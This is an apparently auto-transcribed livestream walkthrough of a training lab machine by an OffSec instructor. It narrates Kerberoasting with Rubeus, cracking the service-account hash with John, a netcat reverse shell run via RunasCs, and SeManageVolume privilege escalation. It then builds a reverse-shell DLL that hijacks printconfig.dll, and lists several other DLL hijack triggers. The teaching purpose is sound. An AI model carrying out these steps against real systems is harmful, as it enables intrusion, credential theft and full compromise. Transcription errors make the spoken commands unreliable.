Mimikatz, Rubius comes to mind. Rubius is what we're going to be doing. But basically, if you're thinking of Kerber roasting, guys, students, if you're thinking, commit this to memory, put this in your notes. If you're thinking of Kerber roasting, think TGS. That's Tango Gulf Sierra. Tango Gulf Sierra. TGS. TGS is a KDC component that issues a service ticket when a principal request connection or some connection to Kerberos service is made, right? When a connection to the service of Kerberos is made, we get this KDC component. So what we need is a TGS ticket. Ticket granting service. Just a Guy 1 through 7 already has it. So what we're going to do is I'm going to locate rubius.exe on my attacking platform. And that's in my transfers directory. I'm going to copy that here. There's Rubius. Hello, Rubius. And we're going to type simple HTTP. We're going to grab the IP, curl HTTP, ://8000 /rubius.exe space -o./rubius.exe. And there's the code 200. And there's the pause for a second, and there is the Rubius. We have Rubius. Now, Rubius is going to make things very nice for us. What we're going to say is rubius.exe Kerberoast /no wrap. Boom. And we didn't get anything. What happened? Command Rubius was not... Oh, well, I may have to do ./rubius.exe Kerberoast /no wrap. There we go! Oh my gosh! Don't you love it when you remember these things and then they work? You know? Don't you love it? It's the best feeling, dude. When you're attacking something... And it's like, I know what to do. Oh, okay, let's use PowerView. Okay, there's a service principal name, TGS. and so on and so forth. This is Kerberos, this is Rubius. Let's grab that hash without equivocation. Let's grab that hash without equivocation. So I'm going to copy that, and we're going to go back to our hashes, right? Check it. Peep it. Hashes. We're going to nano hashes. We're going to paste it in. Boom. Nano. Emacs. Vim. Fun times in Cleveland. Let's do it. John on hashes -- word list is equal to user share word list rocku.text. Rocku.text. And we got it back instantly. It was right at the top. It was right at the top. Trust no one is the name of the password. So we're going to nano passwords, put that in there. We're going to nano users and put SVC MSSQL. Does anybody know why I have this directory structure? It's for my team. If we're sharing resources, right? If we're sharing resources and we're SSH'd into the same machine, I want any exfilled information readily available to them off the command line landmine. I want any vulnerabilities that we're playing with as a team on the same target. I want the same hashes in there. I want the passwords there and any potential users we might have found. And that way, exactly, Fire Raid, that way we can think crack map, execute, just all the good stuff, right? All the good stuff. Now that we have the password for, let's cat users, and then cat passwords. For SVC MSSQL, what we need to do is we need to get ourselves a reverse shell as SVC MSSQL. That's going to be the trick. Okay, that is going to be the trick. So what we're going to do is let's go ahead and get a reverse shell. Siren, can you stroll up 30 seconds in your window? Yeah, and this is all going to be on YouTube, guys. Don't worry. Don't worry. This is all going to be on YouTube. So we'll keep going. Run as. Bingo, dude. Gosh. Locate run as Cs. Locate invoke-run as Cs.ps1. There it is. I'm going to cd to my files directory. I'm going to copy that to here. And again, simple HTTP. We're transferring a file. I'm going to curl HTTP, my IP, my attacking IP, /, and then we're going to use invoke-run as Cs.ps1. This will allow us to run a single command as a user with a password provided. That's what this does. Just a guy says I'm not familiar with run as Cs. That's what it does. It allows us to run a single command as a user given that we have their password. So we're going to output that as invoke-run as Cs.ps1. Thank you, Hart. You're so welcome. Now that we have this, we are pretty much on our way. So I am going to import module /invoke-run as Cs.ps1. Aren't you going to use run as that comes with the CMD? We could. Yeah, we're good. I just want to introduce this file. It's like I said, it's worked. I haven't said it, but it's worked for me in the past, right? You can run a command as another user, given the username and the password. But yeah, let's keep rocking. Import module /invoke-run as Cs.ps1. I hope that answers your question. This is just it's worked for me in the past. But yeah, you can totally use run as that comes with CMD. For anybody confused, you can type run as cmd.exe, a separate user command line, and punch that into Google. And how do we do this? How do we accomplish this? How does this happen? And look at this. You can totally do that. This is the run as they're talking about. Run as / user, username, path, etc. But we're in PowerShell right now, and we're doing invoke run as Cs. So I'm going to import that module. The module got imported with no error messages. And now we're just going to get down to business. So in order to, if I recall, it goes user password command. So we're just gonna dot, what would it be? Dot invoke run as Cs, or just invoke dash run as Cs, or would it be dot backslash? No, yeah, that's right. That should work. It's out of the present working directory. Invoke run as Cs, and we want svc mssql, and then the password was trust no one. And then we want a full path, right? A full path. Well, we're going to do it this way. We're going to say C, xampp, htdocs, and uploads nc.exe. And then we're going to go back to our IP, and this one is going to be listening on port 4444. And we'll paste the IP in, and we'll say -nv. It works fine here, I guess. 4444-execute cmd.exe. Are we in it right now, or are we in it? I mean, I feel like we're really in it right now. If there's a thing that we're in, I feel like we're in it, because we just hit that return key and we just got shell on the target machine as that user. Who am I? Who am I? Echo percent username percent. How about it? How about it, guys? How about it? How about it? Don't worry if you missed anything. This will be up on YouTube, I promise. Dude, I love Fire Raid 001 immediately coming out with the who am I /priv. See, I'm not the one doing this. You guys are like leading the way. Whoa. Set SE change notify privilege. Oh no. Oh no. Okay. So for this one, is anybody familiar with how we might be able to escalate our privileges with an SE change notify privilege? That description: bypass traverse checking enabled. Think directories, traversals, recursion, maybe some other words. Not a clue, says TuxShell. I think we should first lateral move to another machine. We can do a netstat-ano, and we can do a netstat-ano, and yeah, but I don't see any adjacent machines. No connectivity. That's all our IP address and stuff. Like, we're good. Uncoded service paths. No. Okay, so I'll give a little bit of a nudge here. Little bit of a nudge. Who am I /priv? There is something known as the... Let me actually sudo switch users just for a second, And let's go to machine, cd access, and then we'll go to files. And what we're going to do is locate se manage volume exploit.exe. That's in my transfers as well. We'll copy that here. And let's take a look at the se manage volume exploit on Google. What is this? Enox, if you're listening, shout out to you, my friend. Shout out to you. But what is this? What is this madness? What are these people working on? What are they? I just dropped a thing. What are they doing? SE manage volume abuse. Get full control over C. When the user has SE manage volume privilege, that is allowing reading or writing of any files. One possible way to get a shell from here is to write a custom DLL. So we make our own malicious DLL, and then they're saying tzres.dll and call system info. Some of these are outdated. Some of these DLL hijacks are not going to work. Some of these DLL hijacks have been patched. But I may have some new on behalf of OffSec and a particular individual, Enox. Love you, buddy. We have some new here today. Some of that new stuff, these dominant hacks. We absolutely got them. Now, here's the idea. We're going to drop a simple HTTP for a final transfer. Let's go to here, cd xamp, cd htdocs to stay consistent, cd uploads, dir-a-o-q. Voila! Now we're going to curl HTTP IP on port 8000 / se manage volume exploit.exe and dash output that is / se manage volume exploit.exe. So can anybody tell me, I'm sitting up. Okay, now you guys should be able to hear me. Sorry about that. Stepped on the cord there. But we're back without too much delay. Guys, this is an important principle. This is an important principle. Can anybody explain to some of our newcomers what a DLL hijack is? What does that mean when we say we're hijacking a DLL? A dynamic loading library. Dynamic load library. What does that mean? Yes. Putting a malicious, you guys can hear me, right? I hope so. Putting a malicious DLL in place where it should be. Or, basically some functionality on Windows, right? Look at all these binaries that are running, man. Some functionalities, net start. Look at all these services that start up, They all do so many cool little things, don't they? They call on these little modules called, runtime modules, and in order to perform some kind of function. So if I type system info, guess what's going to happen? That's going to require some tzres.dll, which exists on the system. And if we could overwrite that DLL, in theory, we would be able to get a shell. Now, the issue is that that's been basically patched. Are we out of luck? No. We've got a little bit of new. So the Phantasmos says, I'm very new to hacking Windows. This has been extremely or very beneficial. Walkthrough. My pleasure. That is what that is what this is here for. That is what we are here for. That is what we are doing. So what we're going to do, if I whoami /priv, bada boom, bada bing, bypass traverse checking, bad, dot / se manage volume exploit.exe. And let's let it do its thing. Done. That's how quick that was. Entries changed 917. 917 entries changed, dude. Yeah. In the words of a one Tux Shells, dang. Dang. Gulp. Entries changed 917 entries. What this means is that we have administrative write access to anywhere on the machine. Ooh, that sounds interesting. That sounds interesting. You guys know how I have my common, I have my Venom reference, I have my breakout command, I have all of these, right? I also have one called DLL reference. And all of these above are located on a GitHub. So these are all what we have known as DLL triggers. Let me explain. WP Core Util. This is the Windows Insider Service, or WISVC, triggered by clicking the Start menu, Windows Insider Program. So if we had RDP and we could open up the Windows Insider Program by clicking on it, that would trigger. This DLL would trigger. So if we could overwrite that with a reverse shell malicious DLL, we would get a reverse shell when we clicked that. Info.dll. Windows Problem Reporting Service. Open up that and you get it. That doesn't require a reboot. The trigger in this particular case, DXGI. So DXGI.dll, that's Windows Security, check for protection updates. And you can trigger that there. What's the trigger? TZRes, again, system info, network service. It's a good one to know, man. Not every country is as secure as, some particular countries. And a lot are using more outdated things due to money, don't have security programs, don't have as much protection, and they don't get the updates, and they get owned by tzres.dll being malicious and someone typing system info. And then their network gets jacked. But that's the story of how that goes. So there is one that we can use. And it's called print config. Okay? Print config. I already have this rocking and rolling and ready to go. It's at the bottom because this is the one that, it's at the almost bottom because this is the one that my buddy provided me with, right? So I am going to if config ton 0, make sure we only get one shot at this. Did I mention we only get one shot at this? We only get one shot at this. This is a -A x64. The payload is Windows x64-bit. We enumerated that back in our nmap scan. Look, Windows x64 operating system. So our payload has to be x64. Shell reverse TCP. Our IP address is going to be .45.244, and our port is going to be 1337. Our format as a DLL - output as printconfig.dll. Yeah, localize all your resources, Phantasmo. Absolutely. Without equivocation, as I've taken to saying. Without equivocation and with no objection. Please localize your resources, man. We need that. Got to get those resources localized. So there it is. We've saved the file. And what we're going to do is serve that file up. Let's curl it. Curl HTTP. Here, port 8000. /print config.dll. -output is /print config.dll. And the GitHub, oh no, wait. I misspelled it, didn't I? Did I? What happened here? Print, I said capital. It's case sensitive, everybody. Print config.dll -output /print config.dll. Man, I got one shot at this. Otherwise, we are busted. So -o././print config.dll and smash the return key. dir-a-o-q. And according to researchers, Enox, thank you. What we have, if I do my DLL reference, scroll up, down. We have to overwrite it. Currently, it exists out of C, Windows, System32, spool drivers, x64, 3. So I am going to copy print config. Wait a second. I'm going to move print config.dll, just in case, to print config.dll with the lowercase c. Just in case, like I said, this really is a one-shot. This is a one-shot. If I don't get this, we bust this machine and it is done. So if you're sweating, now's the time. We're going to copy. This is... I'm going to continue and then I'll read that, Julian. No offense. Just going to continue and then we'll get back to that so we can keep this streamlined. I'm going to copy print config.dll to this directory. Okay? Do we want to overwrite? Yes. Yes, we do. One file copied. Remember, entries changed 917 with the SE manage volume exploit. We just overwrote it. Now here comes the fun part. We're going to drop into PowerShell. And it's just this long, I don't know what else to tell you. It is a long bunch of gargly look. If anybody wants to take it apart, that's cool. But this is pretty much the new that we're demonstrating here. I mean, it's on the internet. I think Enoch's put a GitHub on it, which you can go ahead and check. It's on public domain. And we're going to do that. And then we're going to set up a netcat listener on port 1337. And now we're going to pull the trigger. Oh, buddy! Perfection executed with impunity. With impunity. With impunity, man. We're 3 shells deep. We are 3 shells deep. Who am I? Who am I? Yeah, buddy. With that, we can go to CDC. I mean, woo-ha! Woo-ha! We did it, guys. Heck yeah. That's game. That's set. That's match. And as we say around these parts, that is definitely bling bling. Bling bling. Finger guns. Now, let me scroll back up to what Julia was saying. This is something I do not understand. If the service is running, we can't overwrite the DLL. Correct. Unless it's not a service that's running. There are many things that can happen on Windows that only start whenever you call the trigger. For example, in my DLL reference file, like we had, what was it? DLL ref. One of them was a Windows security check, right? And one is when SVC triggered by clicking Start Windows Insider Program, right? So these are all triggers. They can be things that are running. The point is that we have administrative ability to overwrite this. This was all the love. Oh, thank you guys, man. You're too nice. You guys are too nice. Bling, bling. Blingo, blingo. So yeah, that was a one-shot, and we got it. With that, guys, I'm going to go ahead and get the notes here. I'm going to clean this up, and whoo-wee. I mean, where do I even begin here? We did powerview.ps1. If you want to go, you know what? I'm going to keep this. If you want to go back and check the video, I'm going to use this as encouragement. We have SVC Apache, SVC MSSQL, and we got SVC MSSQL Trust No One. And yeah. Takeaway concepts. What are some takeaway concepts? File upload attacks. This is now available on OLL, by the way. That is a module that I wrote that I am super proud of. And aside from that, what else did we learn? Super good stuff, though. What else did we learn from this machine? Did anybody... You know what? I've never done this before. DLL hijacking. Okay. I've never done this before. What did you guys learn? Beginners. I don't care what it is. I don't care what it is. Never done this. You're completely new to cybersecurity. I'm talking to you. I'm talking to you. I'm talking to you. Listen to me. If you're new to cybersecurity, what did you take away from this just by spectating, by watching? Definitely learned some stuff. The .ht access was definitely an interesting thing. Okay, I'll add that in there. .ht access. Cough. Excellent. Will this be on YouTube? Yes, this will be on YouTube in a few hours. That you should be pen testing full time instead. Yeah, man, I would love to. But I write content, I develop machines here at Offensive Security, and I love my team and I love the people that I work with. But you're totally right. I really do. I really do miss being in the grind. I do, man. Found that. Yeah, the bypass filter upload. Absolutely. I learned a better sense of what is required for proper enumeration of Windows PE. I mean, what's required for proper Windows privilege escalation? And let's just go ahead and put whoami/priv, powerview.ps1. You know, what else did we learn? Kerberoasting attacks. We learned about that. We learned about TGS. We learned about, TGS and tickets. We learned how to crack those hashes. We learned how to run a command as a separate Windows user, given the username, which would have anyway, and the password. I mean, we've learned all of these things, right, guys? So this is all information you would take away in your notes. Make your own notes. I'm going to move this over here. Don't switch. Into general chat. And this is regarding access. Bada boom and bada bing. And let me correct the spelling on that. And I'll go ahead and drop this off. And we'll close that. With that being said, guys, let's go ahead and check out offsec.com/webinars and see if there's any webinars going on right now. On demand webinars, Paul Griffin is going to be speaking with Dennis Kusinik, VP of Operations at Packet Labs. So if you're interested in Packet Labs and what they're doing over there, VP of Operations Dennis is going to be speaking with our head of customer success, Paul Griffin. With that, guys, I am going to be ending the stream here. Thank you, everybody, for being so kind, lighthearted, and having fun. That's the essence of what we really like here in the InfoSec community, because let's face it, it's a marathon. It ain't a race, and, sometimes we gotta be there for each other, right? In fact, I'd say always. Reading the chat now says, thanks for another awesome stream, Siren. Learned a lot. You are welcome. It is my pleasure. It is my pleasure. Thank you for yet another awesome stream, Siren. Till next time, Siren. Thank you, Siren. Thank you, guys. Thank you. Thank you. And guess what? Happy hacking, intruder.